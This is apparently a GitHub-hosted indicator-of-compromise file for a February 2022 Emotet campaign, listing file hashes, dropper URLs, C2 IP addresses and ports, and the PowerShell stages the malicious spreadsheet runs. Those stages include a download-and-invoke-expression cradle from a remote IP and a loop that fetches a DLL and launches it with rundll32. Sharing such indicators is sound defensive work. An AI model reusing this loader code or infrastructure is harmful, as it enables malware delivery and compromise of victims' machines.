-
Notifications
You must be signed in to change notification settings - Fork 10
/
e5_emotet_08.02.2022.txt
112 lines (93 loc) · 3.22 KB
/
e5_emotet_08.02.2022.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
Emotet - e5 - 08.02.2022
************************************************************************************
.xls b64988fe8d0aa76483014e3af670e7b5f0529341a339948967d8a5ba0a44fec3
.dll 41a227b08579b8c6a0461ec05ad8f771a4dfb5aa8269bcd3c229cd925591a70a
http://lbsbriefs.com/cgi/2kl8X826xEKeuhI/
http://howebeautiful.com/eln-images/tyj208/
http://lazylargomotels.com/cgi/wZrYbJ/
http://sleepstarlite-ozark.com/batesville/UjX/
http://osaka.musicaldog.com/05-set/YLBOd/
http://mattknapp.net/Resources/OipJPXsI/
https://erolmutfak.com/dso/S3d34UHm0Qkibn57N0G/
http://catower.com/cgi/iC2/
http://meridianites.com/cgi/pBoGxZ9igKZKn/
http://hoodeeconsulting.com/cgi/I2N0wPElFdvAP2dZ2K6/
http://rinoflexconnectors.com/eln-images/MIzLHf0Wk6wXNS/
https://egemenrulman.com/Fox-C404/qrr2OCShGJGH06Gm/
http://skyridgedesigns.com/eln-images/38pr2cu3xt2Ai/
.xls 719900e330cecd87250ac1f6c31f2d6f42f226294fb011cf47c442f8d2b7455b
.dll da6ce8966d86b8359b27559659ba1b51d41d6bc512667144d9ea9c6c31ec039b
.ps1
# powershell snippet 0
$c1 = "(New-Object Net.We"
$c4 = "bClient).Downlo"
$c3 = "adString('hxxp://91.240.118.172/ss/ss.png')"
$ji = "(New-Object Net.WebClient).DownloadString('hxxp://91.240.118.172/ss/ss.png')"
invoke-expression "(New-Object Net.WebClient).DownloadString('hxxp://91.240.118.172/ss/ss.png')"|invoke-expression
# powershell snippet 1
(new-object net.webclient).downloadstring("hxxp://91.240.118.172/ss/ss.png")
.png
$path = "C{Joo}:\{Joo}Prog{Joo}ramD{Joo}ata\M{Joo}ilossd.{Joo}dl{Joo}l".replace('{Joo}','');
$web = New-Object net.webclient;
$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12,$url13".split(",");
foreach ($url in $urls) {
try {
$web.DownloadFile($url, $path);
if ((Get-Item $path).Length -ge 30000) {
[Diagnostics.Process];
break;
}
}
catch{}
}
Sleep -s 3;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\ProgramData\Milossd.dll',KitKat;
.dll drop
hxxp://mkdevcorp.com/cgi/33HhffLF60pcv/
hxxp://goncalves.com/counter/3OkjcVmCPdokTG/
hxxp://francisdifronzo.com/eln-images/T6yB/
hxxp://k7tgu.com/Bryce/UBfCU05bih/
hxxp://ronfrankproductions.com/4agreements/trEgS/
hxxp://topstravel.com/VPImages/dPW/
hxxp://urieprocor.com/cgi/m2m7z88gOsNceL/
hxxp://mardigrasslandscaping.com/cgi/w4BV/
hxxp://keyesforsteuben.com/cgi/vnBHCHIlWZx/
hxxp://casualenglishchat.com/cgi/6g0pcvCOYPZYn/
hxxp://grimmcm.com/cgi/6hoBPCb3E/
hxxp://intelfirm.com/eln-images/xaTiPeapzK/
hxxp://manningind.com/eln-images/rx7j2VVFK/
c2's
103.42.57.17:8080
93.104.208.37:8080
195.154.146.35:443
62.171.178.147:8080
37.59.209.141:8080
139.196.72.155:8080
37.44.244.177:8080
191.252.103.16:80
217.182.143.207:443
128.199.192.135:8080
103.41.204.169:8080
185.148.168.15:8080
168.197.250.14:80
78.46.73.125:443
194.9.172.107:8080
185.148.168.220:8080
118.98.72.86:443
54.37.106.167:8080
78.47.204.80:443
159.69.237.188:443
116.124.128.206:8080
59.148.253.194:443
85.214.67.203:8080
185.184.25.78:8080
173.203.78.138:443
54.37.228.122:443
198.199.98.78:8080
195.77.239.39:8080
210.57.209.142:8080
66.42.57.149:443
104.131.62.48:8080
54.38.242.185:443
190.90.233.66:443
207.148.81.119:8080
203.153.216.46:443